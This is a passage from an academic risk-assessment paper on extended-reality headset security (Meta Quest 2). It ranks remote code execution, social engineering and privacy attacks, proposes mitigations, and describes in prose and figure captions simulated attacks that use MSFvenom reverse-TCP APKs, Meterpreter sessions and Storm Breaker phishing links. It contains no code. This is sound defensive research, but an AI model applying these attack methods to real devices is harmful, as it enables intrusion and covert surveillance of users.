Table 6 presents the calculated risk scores, derived by multiplying three components: likelihood, vulnerability, and impact. This computation directly supported the achievement of this study’s third contribution, which involved the development of a structured risk quantification model tailored to XR environments. The results reveal that RCE had the highest score, 41, which results from a high likelihood value of 0.79, a critical vulnerability score of 8.8, and a severe impact rating of 5.9.
This suggests that RCE is not only easy to exploit due to the availability of public tools like Metasploit and MSFvenom but also compromises all three pillars of XR system security: confidentiality, integrity, and availability. The high values for both vulnerability and impact reflect how deeply embedded the exploit is in system permissions and how much control it gives the attacker.
In comparison, social engineering and insecure app installation also exhibit high risk scores of 37 and 30, respectively, largely due to the elevated likelihood and prevalence of user-triggered attack vectors. These threats exploit users’ trust and interactions with immersive environments, making these issues particularly dangerous in XR scenarios where security prompts are easily overlooked. Their impact is substantial, particularly in terms of enabling further problems such as unauthorized access or persistent control.
On the other hand, threats related to privacy, such as eavesdropping, surveillance, and location tracking, were assessed as posing a lower risk, but one that remains significant. Although these threats primarily affect confidentiality, they are less likely to compromise core system functions. However, they pose serious risks to user safety and personal data, particularly when combined with other vectors.
The visual presentations below further illustrate the breakdown of these findings. As shown in Figure 13, the threats were ranked by their computed risk scores. Remote Code Execution (RCE) emerged as the highest-risk scenario due to its strong exploitability and system-level impact and the wide availability of attack tools. Social engineering and insecure app installation followed closely, indicating that user-centric and permission-based attacks pose serious risks in XR environments. Meanwhile, threats such as location tracking and surveillance scored lower but still present meaningful privacy risks, particularly in immersive systems where users are less aware of sensor activity.
As illustrated in Figure 14, Remote Code Execution and social engineering were assigned the highest vulnerability levels (8.8), indicating their ease of exploitation and the public availability of associated tools. These threats also have a substantial impact on system integrity and user trust. In contrast, eavesdropping, surveillance, and location tracking yielded lower impact scores, yet they still raise serious privacy concerns, especially given XR’s continuous data collection and immersive design, which may decrease user awareness.
As shown in Figure 15, most threats are associated with high impact values but relatively lower likelihood scores. This reflects the dependency on user actions such as granting permission or clicking malicious links, especially in XR environments, where immersive experiences can lower security awareness. Remote Code Execution and social engineering stand out due to their combination of a significant impact with a moderately high likelihood, reinforcing their classification as critical risks.

6. Discussion

XR environments heavily rely on underlying technologies, making them susceptible to various technical vulnerabilities. In this Section, we discuss the results of the risk assessment and their impact on XR security, offering a deeper analysis of threat behaviors, system weaknesses, and the human factors that amplify the risks mentioned.
One of the greatest risks identified in this study was RCE via malicious APK delivery. This threat has severe consequences, with the potential to lead to the establishment of a backdoor, enabling attackers to gain persistent access, execute unauthorized commands, and exfiltrate sensitive data. As a result, device integrity can be compromised, as demonstrated by the inception attack simulated by Yang et al. [17], which allowed further system exploitation and, in some cases, led to disrupted availability. RCE significantly impacts the CIA of XR systems. The high risk score reflects the feasibility of this exploit, which requires no physical access and benefits from high attack popularity and availability, meaning that exploit tools are widely accessible.
The success of this attack largely depends on the user’s actions, particularly their willingness to enable developer mode and install an application from an unverified source. Many users are unaware of the risks associated with enabling developer mode or may be easily deceived by a convincing social engineering tactic. While Meta does warn users of the dangers of installing apps from unknown sources, enabling developer mode remains necessary for developers [57]. This highlights how XR platform-level design decisions can create systemic vulnerabilities.
The study also highlights the key role of social engineering in XR security breaches. Social-engineering attacks exploit human psychology to bypass technical barriers, taking advantage of users’ trust in virtual environments and lack of familiarity with XR security threats. Attackers manipulate XR-specific behaviors, such as users’ tendency to trust familiar interfaces or grant permissions under the guise of enhancing their experience. The immersive nature of XR can make users more likely to trust system prompts and grant permissions without proper scrutiny. Additionally, users engaged in immersive experiences are more vulnerable to deceptive phishing tactics, as their focus on the virtual world reduces their ability to critically assess security prompts. The prominence of social engineering as a major attack vector underscores the necessity of prioritizing the consideration of human vulnerabilities when designing security controls for XR environments.
Insecure app installation emerged as a high-risk factor. In the studied scenario, the malicious APK was installed when users enabled or abused permissions to install applications from unknown sources. Many XR users sideload APKs and may unintentionally install malicious applications, potentially establishing a TCP reverse connection, granting attackers unauthorized remote access to the device.
Such unauthorized access compromises confidentiality and privacy, as XR devices store vast quantities of sensitive user data. Unauthorized access and data exfiltration pose a medium-level threat but can serve as a gateway for further exploits. For instance, in Scenario 1, the app_list output (Figure 5) reveals system services that maintain device integrity and security. Attackers could disable services like com.oculus.appsafety, which ensures device security, thereby bypassing security controls. Similarly, attackers could manipulate com.oculus.guardian, which protects users’ physical boundaries, increasing the risk of physical injuries. Furthermore, com.meta.AccountsCenter.pwa and com.oculus.companiondevicemanager could be exploited to bypass authentication mechanisms, forcing unauthorized logins and remotely pairing compromised devices for persistent access. Gaining file system access allows attackers to view, upload, or delete files, leading to potential data theft, app data modifications, and/or the deletion of critical system files, ultimately disrupting a device’s functionality.
While eavesdropping, surveillance, and location tracking do not directly compromise system functionality, they pose serious privacy threats, primarily affecting confidentiality. Although classified as lower risks in this study, these threats still have significant implications for user privacy. For instance, eavesdropping allows attackers to intercept and record real-time conversations, compromising sensitive information [58]. Similarly, surveillance via unauthorized camera access can lead to visual-data breaches, enabling attackers to monitor users’ surroundings without consent.
Location tracking presents another privacy risk, allowing attackers to monitor physical movements and launch targeted social-engineering attacks. Attackers can combine location data with other personal information to create comprehensive user profiles, increasing the risk of stalking, harassment, and physical security violations. The primary vulnerability enabling these attacks is weak permission controls. Many users tend to overlook permission settings, granting unnecessary access to applications. The XR environment amplifies this risk as users are less likely to verify or restrict permissions in immersive scenarios. These privacy threats highlight the need for more stringent permission control mechanisms to mitigate unauthorized data access.

6.1. Analytical Interpretation

The scenarios and their associated risks reveal more than just technical exploitation; they highlight a complex interaction between platform design decisions, user behaviors, and permission systems unique to XR. For instance, RCE exploits were made possible not only by APK sideloading but also a lack of runtime permission validation and the user’s trust in immersive prompts. These issues reflect broader design gaps in XR platforms, where the reality of immersion tends to lower user vigilance.
The social-engineering attacks demonstrated the vulnerability of XR users to manipulation, particularly when prompts are delivered during immersion, reducing critical evaluation. Similarly, weak permission controls and a lack of persistent indicators for camera, microphone, and location usage, reflect oversight in systems that adversaries could exploit for surveillance and location tracking.
Thus, while the technical feasibility of these attacks is significant, the real enabler is the alignment of exploitable system functions with predictable user behaviors in immersive environments. This makes XR platforms particularly vulnerable to low-complexity, high-impact social-engineering and permission-based attacks.

6.2. Methodological Limitations and Future Work

Although this study is grounded in real-world exploit tools and scenarios, its methodology was limited to client-side attacks using a small sample of XR devices, specifically the Meta Quest 2. Broader XR ecosystems such as Microsoft HoloLens, ARKit/ARCore platforms, and multi-user virtual environments remain unexplored. Future work should expand this methodology to include network-layer attacks, malicious augmented reality content injection, adversarial spatial mapping, and AI-driven behavioral exploits. Cross-platform comparisons will also provide insights into architectural weaknesses across XR vendors.
Furthermore, focusing on real-time security enforcement, context-aware permission systems, and intelligent sensor access auditing may increase system resilience. The ethical implications of immersive deception and real-time psychological manipulation [59] also warrant in-depth exploration.

7. Mitigation Strategies

To address the identified security threats in XR environments, this Section outlines mitigation strategies focusing on technical controls, policy enforcement, and user awareness. The proposed measures are intended to reduce attack surfaces, strengthen system security, and enhance user protection against evolving cyber threats in XR ecosystems.
Developer mode exploitation has been demonstrated to be a viable attack vector in previous studies, including the work of Yang et al. [17]. To mitigate this risk, session-based developer mode should be set to automatically disable after a predefined period to reduce prolonged exposure to attacks. Building on that, users should receive real-time notifications whenever developer mode is activated or modified to increase transparency and accountability. Again, Android Debug Bridge (ADB) connections must be limited to only trusted applications and authenticated users to prevent unauthorized access.
Poor permission control in XR environments allows malicious applications to exploit excessive privileges for unauthorized access. Providing granular permission controls to enable users to approve or reject particular rights according to the use case will help address this issue. In addition, real-time permission alerts are necessary to notify users whenever an application accesses their microphone, camera, or location data.
Permissions can be automatically retracted, for example, if a program is not being used or after a predetermined amount of inactivity, while regular audits of granted permissions can help users review and modify access settings, ensuring that applications do not retain unnecessary permissions that could be exploited by attackers.
Insecure app installation and excessive permissions can introduce vulnerabilities in XR devices. In order to address this, it is appropriate for apps from unknown sources to be subjected to automatic scanning to detect malicious behavior before they are installed. Enforcing sandboxed execution for XR applications is a promising solution to preventing unauthorized system modifications.
To address social-engineering attacks, it is essential to create educational initiatives to raise awareness about the unique security and privacy risks associated with XR technologies [60]. Enhanced user awareness training and phishing-resistant security mechanisms in the form of interactive tutorials that teach users about security settings and explain the implications of granting permissions can help users make informed decisions [22]. These tutorials should be designed to engage users within the immersive environment, ensuring they are relevant and easy to understand. Another important solution pertains to the area of gamification. Gamification has the potential to be a powerful tool for educating users about security risks and best practices [61]. With its integration, users can learn to recognize and react to dangers in a controlled and entertaining way by introducing security tasks and rewards into the XR environment [62]. Also, security prompts must be displayed with clear explanations before access to critical XR functions can be granted.
To address privacy risks, including eavesdropping, location tracking, and unauthorized surveillance, location-tracking features should require users’ explicit consent for each tracking session, and visual indicators should be displayed whenever the microphone, the camera, or motion-tracking functions are in use to enhance user awareness. All voice-, video-, and text-based communications must be encrypted to prevent unauthorized interception.

8. Conclusions

The increasing amount of attention paid to the metaverse has accelerated the development and advancement of its underlying technologies, particularly XR [63]. As XR becomes more integral to the metaverse, its rapid evolution and adoption pose unique security challenges that must be carefully assessed and addressed [64]. In this study, we conducted a scenario-driven risk assessment using real-world exploits and a structured likelihood model combined with CVSS scoring to quantify and prioritize threats across XR environments.
The findings confirm that Remote Code Execution, social engineering, and insecure app installation pose the most severe risks. These threats were not only assigned the highest composite risk scores (RCE: 41, social engineering: 37) but also demonstrated their ability to compromise confidentiality, integrity, and availability. The experimental scenarios confirmed the feasibility of these threats via widely available tools such as MSFvenom and Metasploit, highlighting the real-world relevance of these attack vectors in XR systems.
While lower-level risks such as eavesdropping, surveillance, and location tracking may not directly compromise system functionality, they remain significant due to their impact on user privacy and trust. These threats exploit weak or overly broad permission models common to XR platforms, allowing unauthorized access to sensors without persistent indicators or user awareness. Their classification as lower risk reflects their indirect effect on system integrity but also reinforces the importance of granular permission settings, real-time access notifications, and encrypted communication channels.
Additionally, medium-risk threats, such as unauthorized access and data exfiltration, with a risk score of 25, suggest the need for targeted mitigations including session-based developer mode controls and strengthened authentication. These recommendations are grounded in the scenario findings, where attackers could bypass security boundaries by exploiting system-level services (e.g., com.oculus.guardian), as indicated in Figure 5.
Overall, this research provides a structured framework with which to assess XR-specific threats, one grounded in practical exploitation and quantitative evaluation. This study contributes to the growing body of XR security research by offering empirical insight into the prioritization of threats across technical and human vectors.

Author Contributions

Conceptualization, R.A., D.-M.P. and T.C.B.; methodology, R.A, D.-M.P. and T.C.B.; software, R.A., I.-A.O. and A.R.; validation, T.C.B., A.R. and R.A.; formal analysis, R.A.; investigation, R.A. and I.-A.O.; resources, R.A.; data curation, R.A.; writing—original draft preparation, R.A.; writing—review and editing, D.-M.P., T.C.B., A.R., I.-A.O. and R.A.; visualization, R.A. and I.-A.O.; supervision, D.-M.P. and T.C.B. All authors have read and agreed to the published version of the manuscript.

Funding

This research received no external funding.

Institutional Review Board Statement

Not applicable.

Informed Consent Statement

Not applicable.

Data Availability Statement

The original contributions presented in this study are included in the article. Further inquiries can be directed to the corresponding author.

Conflicts of Interest

The authors declare no conflicts of interest.

References

  1. Kadena, E.; Gupi, M. Human Factors in Cybersecurity: Risks and Impacts. Secur. Sci. J. 2021, 2, 51–64. [Google Scholar] [CrossRef]
  2. Hamayun, M. The Importance of the Human Factor in Cyber Security—Check Point Blog, The Human Factor of Cyber Security. Available online: https://blog.checkpoint.com/security/the-human-factor-of-cyber-security/ (accessed on 27 August 2024).
  3. Pasdar, A.; Koroniotis, N.; Keshk, M.; Moustafa, N.; Tari, Z. Cybersecurity Solutions and Techniques for Internet of Things Integration in Combat Systems. IEEE Trans. Sustain. Comput. 2024, 10, 1–20. [Google Scholar] [CrossRef]
  4. Akhtar, S.; Sheorey, P.A.; Bhattacharya, S.; Ajith, K.V.V. Cyber Security Solutions for Businesses in Financial Services: Challenges, Opportunities, and the Way Forward. Int. J. Bus. Intell. Res. 2021, 12, 82–97. [Google Scholar] [CrossRef]
  5. Qamar, S.; Anwar, Z.; Afzal, M. A systematic threat analysis and defense strategies for the metaverse and extended reality systems. Comput. Secur. 2023, 128, 103127. [Google Scholar] [CrossRef]
  6. Iqbal, M.; Xu, X.; Nallur, V.; Scanlon, M.; Campbell, A. Security, Ethics, and Privacy Issues in the Remote Extended Reality for Education; Springer Nature Singapore Pte Ltd.: Singapore, 2023. [Google Scholar] [CrossRef]
  7. Acheampong, R.; Balan, T.C.; Popovici, D.-M.; Tuyishime, E.; Rekeraho, A.; Voinea, G.D. Balancing usability, user experience, security and privacy in XR systems: A multidimensional approach. Int. J. Inf. Secur. 2025, 24, 112. [Google Scholar] [CrossRef]
  8. Soto Ramos, M.; Acheampong, R.; Popovici, D.-M. A multimodal interaction solutions. “The Way” for Educational Resources. In Proceedings of the International Conference on Virtual Learning—Virtual Learning—Virtual Reality, 18th ed.; The National Institute for Research & Development in Informatics—ICI Bucharest (ICI Publishing House): București, Romania, 2023; pp. 79–90. [Google Scholar] [CrossRef]
  9. Guo, H.; Dai, H.-N.; Luo, X.; Zheng, Z.; Xu, G.; He, F. An Empirical Study on Oculus Virtual Reality Applications: Security and Privacy Perspectives. arXiv 2024, arXiv:2402.13815. [Google Scholar] [CrossRef]
  10. Silva, T.; Paiva, S.; Pinto, P.; Pinto, A. A Survey and Risk Assessment on Virtual and Augmented Reality Cyberattacks. In Proceedings of the 2023 30th International Conference on Systems, Nevada, LV, USA, 30 June 2023; Signals and Image Processing (IWSSIP): Piscataway, NJ, USA, 2023; pp. 1–5. [Google Scholar] [CrossRef]
  11. Thorsteinsson, G.; Page, T. Using a virtual reality learning environment (VRLE) to meet future needs of innovative product design education. In Proceedings of the International Conference on Engineering and Product Design Education, Newcastle upon Tyne, UK, 13–14 September 2007; p. 6. [Google Scholar]
  12. Kumar Yekollu, R.; Bhimraj Ghuge, T.; Biradar, S.S.; Haldikar, S.V.; Mohideen, A.K.O.F. Securing the Virtual Realm: Strategies for Cybersecurity in Augmented Reality (AR) and Virtual Reality (VR) Applications. In Proceedings of the 2024 8th International Conference on I-SMAC (IoT in Social, Mobile, Analytics and Cloud) (I-SMAC), Kirtipur, Nepal, 3–5 October 2024; pp. 520–526. [Google Scholar] [CrossRef]
  13. Ramaseri-Chandra, A.N.; Pothana, P. Cybersecurity threats in Virtual Reality Environments: A Literature Review. In Proceedings of the 2024 Cyber Awareness and Research Symposium (CARS), Grand Forks, ND, USA, 28–29 October 2024; IEEE: Piscataway, NJ, USA, 2024; pp. 1–7. [Google Scholar]
  14. Casey, P.; Baggili, I.; Yarramreddy, A. Immersive Virtual Reality Attacks and the Human Joystick. IEEE Trans. Dependable Secur. Comput. 2021, 18, 550–562. [Google Scholar] [CrossRef]
  15. Shi, C.; Xu, X.; Zhang, T.; Walker, P.; Wu, Y.; Liu, J.; Saxena, N.; Chen, Y.; Yu, J. Face-Mic: Inferring live speech and speaker identity via subtle facial dynamics captured by AR/VR motion sensors. In Proceedings of the 27th Annual International Conference on Mobile Computing and Networking, New Orleans, LA, USA, 25–29 October 2021; ACM: New York, NY, USA, 2021; pp. 478–490. [Google Scholar] [CrossRef]
  16. Chukwunonso, A.G.; Njoku, J.N.; Lee, J.-M.; Kim, D.-S. Security in Metaverse: A Closer Look. In Proceedings of the Korean Institute of Communications and Information Sciences, Pyeongchang, Republic of Korea, 3 February 2022; p. 3. [Google Scholar]
  17. Yang, Z.; Li, C.Y.; Bhalla, A.; Zhao, B.Y.; Zheng, H. Inception Attacks: Immersive Hijacking in Virtual Reality Systems. arXiv 2024, arXiv:2403.05721. [Google Scholar]
  18. Shabut, A.M.; Lwin, K.T.; Hossain, M.A. Cyber attacks, countermeasures, and protection schemes—A state of the art survey. In Proceedings of the 2016 10th International Conference on Software, Knowledge, Information Management & Applications (SKIMA), Kuching, Malaysia, 14–16 December 2016; pp. 37–44. [Google Scholar] [CrossRef]
  19. Imperva. 2023-Imperva-Bad-Bot-Report. The Cyber Threat Index, 2023. Available online: https://www.imperva.com/ (accessed on 27 August 2024).
  20. Cyberattacks on Gaming: Why the Risks Are Increasing for Gamers. Available online: https://www.makeuseof.com/cyberattacks-gaming-risks-increasing/ (accessed on 21 March 2024).
  21. Dastgerdy, S. Virtual Reality and Augmented Reality Security: A Reconnaissance and Vulnerability Assessment Approach. arXiv 2024, arXiv:2407.15984. [Google Scholar] [CrossRef]
  22. Rao, P.S.; Krishna, T.G.; Muramalla, V.S.S.R. Next-Gen Cybersecurity for Securing Towards Navigating the Future Guardians of the Digital Realm. Int. J. Progress. Res. Eng. Manag. Sci. 2023, 3, 178–190. [Google Scholar] [CrossRef]
  23. Ogundare, E. Human Factor in Cybersecurity. arXiv 2024, arXiv:2407.15984v1. [Google Scholar]
  24. Lin, J.; Latoschik, M.E. Digital body, identity and privacy in social virtual reality: A systematic review. Front. Virtual Real. 2022, 3, 974652. [Google Scholar] [CrossRef]
  25. Valea, O.; Oprişa, C. Towards Pentesting Automation Using the Metasploit Framework. In Proceedings of the 2020 IEEE 16th International Conference on Intelligent Computer Communication and Processing (ICCP), Cluj-Napoca, Romania, 26–28 August 2020; pp. 171–178. [Google Scholar] [CrossRef]
  26. National Institute of Standards and Technology. Framework for Improving Critical Infrastructure Cybersecurity, Version 1.1; National Institute of Standards and Technology: Gaithersburg, MD, USA, 2018. [Google Scholar] [CrossRef]
  27. Gulhane, A.; Vyas, A.; Mitra, R.; Oruche, R.; Hoefer, G.; Valluripally, S.; Calyam, P.; Hoque, K.A. Security, Privacy and Safety Risk Assessment for Virtual Reality Learning Environment Applications. In Proceedings of the 2019 16th IEEE Annual Consumer Communications & Networking Conference (CCNC), Las Vegas, NV, USA, 4–7 January 2019; IEEE: Piscataway, NJ, USA, 2019; pp. 1–9. [Google Scholar]
  28. King, A.; Kaleem, F.; Rabieh, K. A Survey on Privacy Issues of Augmented Reality Applications. In Proceedings of the 2020 IEEE Conference on Application, Information and Network Security (AINS), Kota Kinabalu, Malaysia, 7–9 December 2020; IEEE: Piscataway, NJ, USA, 2020; pp. 32–40. [Google Scholar] [CrossRef]
  29. Adams, D.; Bah, A.; Barwulor, C. Ethics Emerging: The Story of Privacy and Security Perceptions in Virtual Reality. In Proceedings of the Fourteenth Symposium on Usable Privacy and Security, Baltimore, MD, USA, 12–14 August 2018. [Google Scholar]
  30. Ling, Z.; Li, Z.; Chen, C.; Luo, J.; Yu, W.; Fu, X. I Know What You Enter on Gear VR. In Proceedings of the 2019 IEEE Conference on Communications and Network Security (CNS), Washington, DC, USA, 9–11 September 2019; IEEE: Piscataway, NJ, USA, 2019; pp. 241–249. [Google Scholar] [CrossRef]
  31. Qayyum, A.; Butt, M.A.; Ali, H.; Usman, M.; Halabi, O.; Al-Fuqaha, A.; Abbasi, Q.H.; Imran, M.A.; Qadir, J. Secure and Trustworthy Artificial Intelligence-Extended Reality (AI-XR) for Metaverses. arXiv 2022, arXiv:2210.13289. [Google Scholar] [CrossRef]
  32. Read Akamai Threat Research—Gaming Respawned|Akamai. Available online: https://www.akamai.com/resources/state-of-the-internet/soti-security-gaming-respawned (accessed on 21 March 2024).
  33. Hollerer, S.; Sauter, T.; Kastner, W. Risk Assessments Considering Safety, Security, and Their Interdependencies in OT Environments. In Proceedings of the 17th International Conference on Availability, Reliability and Security, Vienna, Austria, 23–26 August 2022; pp. 1–8. [Google Scholar] [CrossRef]
  34. Parkinson, S.; Ward, P.; Wilson, K.; Miller, J. Cyber Threats Facing Autonomous and Connected Vehicles: Future Challenges. IEEE Trans. Intell. Transp. Syst. 2017, 18, 2898–2915. [Google Scholar] [CrossRef]
  35. Gopal, S.R.K.; Wheelock, J.D.; Saxena, N.; Shukla, D. Hidden Reality: Caution, Your Hand Gesture Inputs in the Immersive Virtual World are Visible to All! In Proceedings of the 32nd USENIX Security Symposium, Anaheim, CA, USA, 9–11 August 2023. [Google Scholar]
  36. Gugenheimer, J.; Tseng, W.-J.; Mhaidli, A.H.; Rixen, J.O.; McGill, M.; Nebeling, M.; Khamis, M.; Schaub, F.; Das, S. Novel Challenges of Safety, Security and Privacy in Extended Reality. In Proceedings of the CHI Conference on Human Factors in Computing Systems Extended Abstracts, New Orleans, LA, USA, 29 April–5 May 2022; ACM: New York, NY, USA, 2022; pp. 1–5. [Google Scholar] [CrossRef]
  37. Vondráček, M.; Baggili, I.; Casey, P.; Mekni, M. Rise of the Metaverse’s Immersive Virtual Reality Malware and the Man-in-the-Room Attack & Defenses. Comput. Secur. 2023, 127, 102923. [Google Scholar] [CrossRef]
  38. El-Hajj, M. Cybersecurity and Privacy Challenges in Extended Reality: Threats, Solutions, and Risk Mitigation Strategies. Virtual Worlds 2024, 4, 1. [Google Scholar] [CrossRef]
  39. Cayir, D.; Acar, A.; Lazzeretti, R.; Angelini, M.; Conti, M.; Uluagac, S. Augmenting Security and Privacy in the Virtual Realm: An Analysis of Extended Reality Devices. IEEE Secur. Priv. 2024, 22, 10–23. [Google Scholar] [CrossRef]
  40. Khan, S.; Parkinson, S. Review into State of the Art of Vulnerability Assessment Using Artificial Intelligence; Spring: Berlin/Heidelberg, Germany, 2018; pp. 3–32. [Google Scholar] [CrossRef]
  41. Arafat, M.; Hadi, M.; Raihan, M.A.; Iqbal, M.S.; Tariq, M.T. Benefits of connected vehicle signalized left-turn assist: Simulation-based study. Transp. Eng. 2021, 4, 100065. [Google Scholar] [CrossRef]
  42. Lutz, R.R. Safe-AR: Reducing Risk While Augmenting Reality. In Proceedings of the 2018 IEEE 29th International Symposium on Software Reliability Engineering (ISSRE), Memphis, TN, USA, 15–18 October 2018; IEEE: Piscataway, NJ, USA, 2018; pp. 70–75. [Google Scholar] [CrossRef]
  43. Academic: Attack Trees—Schneier on Security, Schneier on Security. Available online: https://www.schneier.com/academic/archives/1999/12/attack_trees.html (accessed on 13 March 2023).
  44. Ip, H.H.S.; Li, C. Virtual Reality-Based Learning Environments: Recent Developments and Ongoing Challenges. In Hybrid Learning: Innovation in Educational Practices; Cheung, S.K.S., Kwok, L., Yang, H., Fong, J., Kwan, R., Eds.; Lecture Notes in Computer Science; Springer International Publishing: Cham, Switzerland, 2015; Volume 9167, pp. 3–14. [Google Scholar] [CrossRef]
  45. Metasploit Unleashed|MSFvenom|OffSec. Available online: https://www.offsec.com/metasploit-unleashed/msfvenom/ (accessed on 17 April 2024).
  46. Raj, S.; Walia, N.K. A Study on Metasploit Framework: A Pen-Testing Tool. In Proceedings of the 2020 International Conference on Computational Performance Evaluation (ComPE), Shillong, India, 2–4 July 2020; pp. 296–302. [Google Scholar] [CrossRef]
  47. Blancaflor, E.; Billo, H.K.S.; Saunar, B.Y.P.; Dignadice, J.M.P.; Domondon, P.T. Penetration assessment and ways to combat attack on Android devices through StormBreaker—A social engineering tool. In Proceedings of the 2023 6th International Conference on Information and Computer Technologies (ICICT), Raleigh, NC, USA, 24–26 March 2023; pp. 220–225. [Google Scholar] [CrossRef]
  48. Manoj, M.; Sajeev, R.; Biju, S.; Joseph, S. A Collaborative Approach for Android Hacking by Integrating Evil-Droid, Ngrok, Armitage and its Countermeasures. In Proceedings of the National Conference on Emerging Computer Applications (NCECA2020), Kottayam, India, 14 August 2020. [Google Scholar] [CrossRef]
  49. Arunanshu, G.S.; Srinivasan, K. Evaluating the Efficacy of Antivirus Software Against Malware and Rats Using Metasploit and Asyncrat. In Proceedings of the 2023 Innovations in Power and Advanced Computing Technologies (i-PACT), Kuala Lumpur, Malaysia, 8–10 December 2023; pp. 1–8. [Google Scholar] [CrossRef]
  50. Mohanty, S.; Ganguly, M.; Pattnaik, P.K. CIA Triad for Achieving Accountability in Cloud Computing Environment; Pulsus Healthtech Ltd.: Berkshire, UK, 2018. [Google Scholar]
  51. NVD—CVSS v3 Calculator. Available online: https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator (accessed on 19 June 2023).
  52. National Institute of Standards and Technology. Joint Task Force Transformation Initiative Guide for Conducting Risk Assessments; National Institute of Standards and Technology: Gaithersburg, MD, USA, 2012; NIST SP 800-30r1. [Google Scholar] [CrossRef]
  53. An Enhanced Risk Formula for Software Security Vulnerabilities. Available online: https://www.isaca.org/resources/isaca-journal/past-issues/2014/an-enhanced-risk-formula-for-software-security-vulnerabilities (accessed on 22 March 2024).
  54. Csa Guide to Conducting Cybersecurity Risk Assessment for Critical Information Infrastructure 2021. Available online: https://isomer-user-content.by.gov.sg/36/016e3838-a9e5-4c6e-a037-546e8b7ad684/Guide-to-Conducting-Cybersecurity-Risk-Assessment-for-CII.pdf (accessed on 13 June 2023).
  55. Deng, M.; Zhai, H.; Yang, K. Social engineering in metaverse environment. In Proceedings of the 2023 IEEE 10th International Conference on Cyber Security and Cloud Computing (CSCloud)/2023 IEEE 9th International Conference on Edge Computing and Scalable Cloud (EdgeCom), Xiangtan, China, 1–3 July 2023; pp. 150–154. [Google Scholar] [CrossRef]
  56. Boubaker, S.; Karim, S.; Naeem, M.A.; Rahman, M.R. On the prediction of systemic risk tolerance of cryptocurrencies. Technol. Forecast. Soc. Chang. 2024, 198, 122963. [Google Scholar] [CrossRef]
  57. Allow Content from Unknown Sources for Your Meta Quest|Meta Store. Available online: https://www.meta.com/help/quest/articles/headsets-and-accessories/oculus-rift-s/unknown-sources/ (accessed on 31 August 2024).
  58. Chen, Y.; Yu, J.; Kong, L.; Kong, H.; Zhu, Y.; Chen, Y.-C. RF-Mic: Live Voice Eavesdropping via Capturing Subtle Facial Speech Dynamics Leveraging RFID. Proc. ACM Interact. Mob. Wearable Ubiquitous Technol. 2023, 7, 1–25. [Google Scholar] [CrossRef]
  59. Zallio, M.; John Clarkson, P. Metavethics: Ethical, integrity and social implications of the metaverse. In Proceedings of the Intelligent Human Systems Integration (IHSI 2023) Integrating People and Intelligent Systems, Rome, Italy, 27–29 March 2023. [Google Scholar] [CrossRef]
  60. McEvoy, R.; Kowalski, S. Cassandra’s Calling Card: Socio-technical Risk Analysis and Management in Cyber Security Systems. In Proceedings of the Security, Trust, and Privacy in Intelligent Systems, Gjøvik, Norway, 12–14 December 2019. [Google Scholar]
  61. Alqahtani, H.; Kavakli-Thorne, M.; Alrowaily, M. The Impact of Gamification Factor in the Acceptance of Cybersecurity Awareness Augmented Reality Game (CybAR). In HCI for Cybersecurity, Privacy and Trust; Moallem, A., Ed.; Lecture Notes in Computer Science; Springer International Publishing: Cham, Switzerland, 2020; Volume 12210, pp. 16–31. [Google Scholar]
  62. Alnajim, A.M.; Habib, S.; Islam, M.; AlRawashdeh, H.S.; Wasim, M. Exploring Cybersecurity Education and Training Techniques: A Comprehensive Review of Traditional, Virtual Reality, and Augmented Reality Approaches. Symmetry 2023, 15, 2175. [Google Scholar] [CrossRef]
  63. Dwivedi, Y.K.; Hughes, L.; Baabdullah, A.M.; Ribeiro-Navarrete, S.; Giannakis, M.; Al-Debei, M.M.; Dennehy, D.; Metri, B.; Buhalis, D.; Cheung, C.M.K.; et al. Metaverse beyond the hype: Multidisciplinary perspectives on emerging challenges, opportunities, and agenda for research, practice and policy. Int. J. Inf. Manag. 2022, 66, 102542. [Google Scholar] [CrossRef]
  64. Trend Micro Research. Metaverse or Metaworse? Cybersecurity Threats Against the Internet of Experiences; Trend Micro Research: Los Angeles, CA, USA, 2022; p. 24. [Google Scholar]
Figure 1. A workflow diagram of the remote code execution attack in scenario 1.
Figure 1. A workflow diagram of the remote code execution attack in scenario 1.
Information 16 00430 g001
Figure 2. A workflow diagram of the eavesdropping and surveillance attack in scenario 2.
Figure 2. A workflow diagram of the eavesdropping and surveillance attack in scenario 2.
Information 16 00430 g002
Figure 3. Proof of reverse TCP payload generation achieved by using MSFvenom to simulate Android APK-based exploitation in XR environment.
Figure 3. Proof of reverse TCP payload generation achieved by using MSFvenom to simulate Android APK-based exploitation in XR environment.
Information 16 00430 g003
Figure 4. Use of Metasploit’s multi-handler exploit module to establish a reverse TCP connection to the XR device. The terminal output confirmed there was a successful Meterpreter session and displayed system-level information retrieved via the sysinfo command.
Figure 4. Use of Metasploit’s multi-handler exploit module to establish a reverse TCP connection to the XR device. The terminal output confirmed there was a successful Meterpreter session and displayed system-level information retrieved via the sysinfo command.
Information 16 00430 g004
Figure 5. Output of the Meterpreter app_list command, displaying applications installed on the XR device. The list includes system-level services such as com.oculus.appsafety and com.meta.AccountsCenter.pwa, which may be targeted for privilege escalation or to bypass user protections.
Figure 5. Output of the Meterpreter app_list command, displaying applications installed on the XR device. The list includes system-level services such as com.oculus.appsafety and com.meta.AccountsCenter.pwa, which may be targeted for privilege escalation or to bypass user protections.
Information 16 00430 g005
Figure 6. Storm Breaker’s server interface with open port 2525 forwarding traffic through Ngrok.
Figure 6. Storm Breaker’s server interface with open port 2525 forwarding traffic through Ngrok.
Information 16 00430 g006
Figure 7. Ngrok-generated phishing URLs produced by Storm Breaker, targeting camera, microphone, and location sensors via deceptive XR-based interactions. These links simulate legitimate XR features to persuade users to grant sensitive permissions.
Figure 7. Ngrok-generated phishing URLs produced by Storm Breaker, targeting camera, microphone, and location sensors via deceptive XR-based interactions. These links simulate legitimate XR features to persuade users to grant sensitive permissions.
Information 16 00430 g007
Figure 8. A disguised social feature that carries out real-time location tracking.
Figure 8. A disguised social feature that carries out real-time location tracking.
Information 16 00430 g008
Figure 9. Successful delivery of location-tracking information via the Storm Breaker admin panel.
Figure 9. Successful delivery of location-tracking information via the Storm Breaker admin panel.
Information 16 00430 g009
Figure 10. Recorded audio conversations sent to the listening server as a result of the microphone attack.
Figure 10. Recorded audio conversations sent to the listening server as a result of the microphone attack.
Information 16 00430 g010
Figure 11. Admin panel displaying image file received as a result of camera attack.
Figure 11. Admin panel displaying image file received as a result of camera attack.
Information 16 00430 g011
Figure 12. Base score example: generating the vulnerability score and its associated impact score.
Figure 12. Base score example: generating the vulnerability score and its associated impact score.
Information 16 00430 g012
